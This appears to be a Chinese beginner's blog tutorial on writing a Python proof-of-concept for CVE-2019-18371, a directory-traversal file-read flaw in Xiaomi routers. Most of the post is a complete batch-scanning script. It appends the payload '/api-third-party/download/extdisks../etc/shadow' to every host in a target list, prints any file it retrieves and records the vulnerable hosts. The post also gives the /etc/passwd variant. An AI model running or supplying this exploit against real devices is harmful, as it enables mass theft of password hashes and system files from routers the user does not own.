快捷導(dǎo)航

用Python寫漏洞驗證腳本的代碼

更新時間：2022年02月09日 11:47:56 作者：再也沒有留戀的斜陽

這篇文章主要介紹了用Python寫漏洞驗證腳本,本文給大家分享完整實例代碼，代碼簡單易懂，對大家的學習或工作具有一定的參考借鑒價值，需要的朋友可以參考下

小白嘗試寫任意文件讀取poc

我是一個小白，完全不懂Python，但是Python在滲透中往往是一個重要的角色。
有一個CSDN百萬大佬寫了這樣一句話，不會編程的滲透都是耍流氓。
我雖然菜但是也想嘗試學習寫一下Python漏洞的poc和exp。

我是在網(wǎng)上找到的學習方法，隨便記錄一下。嘗試寫一個批量驗證漏洞的poc
發(fā)現(xiàn)小米路由器有一個任意文件讀取漏洞，學著寫了看看

小米路由器遠程任意文件讀取漏洞
小米路由器遠程任意文件讀取漏洞（CVE-2019-18371）
小米路由器的Nginx的配置文件錯誤，導(dǎo)致目錄穿越漏洞實現(xiàn)任意文件讀取。
可通過訪問http://domain.cn/xxx…/etc/passwd實現(xiàn)目錄穿越訪問上級目錄及其子目錄文件。
如訪問http://192.168.1.1/api-third-party/download/extdisks…/etc/passwd 便可以讀取到passwd文件。

寫一個批量驗證漏洞的poc
第一步實現(xiàn)域名和payload拼接
已知payload=/api-third-party/download/extdisks…/etc/passwd

域名和payload拼接如下

import requests
import time
def poc_check(poc):
    for url in open('xiaomi.txt'):
        url = url.replace('\n','')
        poc_url=url+poc
        print(poc_url) # 把域名和payload拼接成一個完整的域名,然后去請求如果返回200就說明存在漏洞。
if __name__=='__main__':
    poc_xiaomi='/api-third-party/download/extdisks../etc/shadow'
    poc_check(poc_xiaomi)

圖片如下

在這里插入圖片描述

拼接好的域名嘗試訪問，如果返回200代表訪問成功說明能讀取到文件說明存在漏洞
返回其他的狀態(tài)碼就代表不存在漏洞
完整代碼如下：

import requests
import time

def poc_check(poc):
    for url in open('xiaomi.txt'):
        url = url.replace('\n','')
        poc_url=url+poc
        # print(poc_url) # 把域名和payload拼接成一個完整的域名,然后去請求如果返回200就說明存在漏洞。
        try:
            print("再也沒有留戀的斜陽")
            print("正在檢測:")
            print(poc_url)
            poc_data=requests.get(poc_url)
            if poc_data.status_code==200:
                print(poc_data.content.decode('utf-8'))
                with open(r'xiaomivuln.txt','a+') as f:
                    f.write(poc_url+'\n')
                    f.close()
        except Exception as e:
            time.sleep(0.1)
            pass
if __name__=='__main__':
    poc_xiaomi='/api-third-party/download/extdisks../etc/shadow'
    # poc_xiaomi1='/api-third-party/download/extdisks../etc/passwd'
    poc_check(poc_xiaomi)
    # poc_check(poc_xiaomi1)

在這里插入圖片描述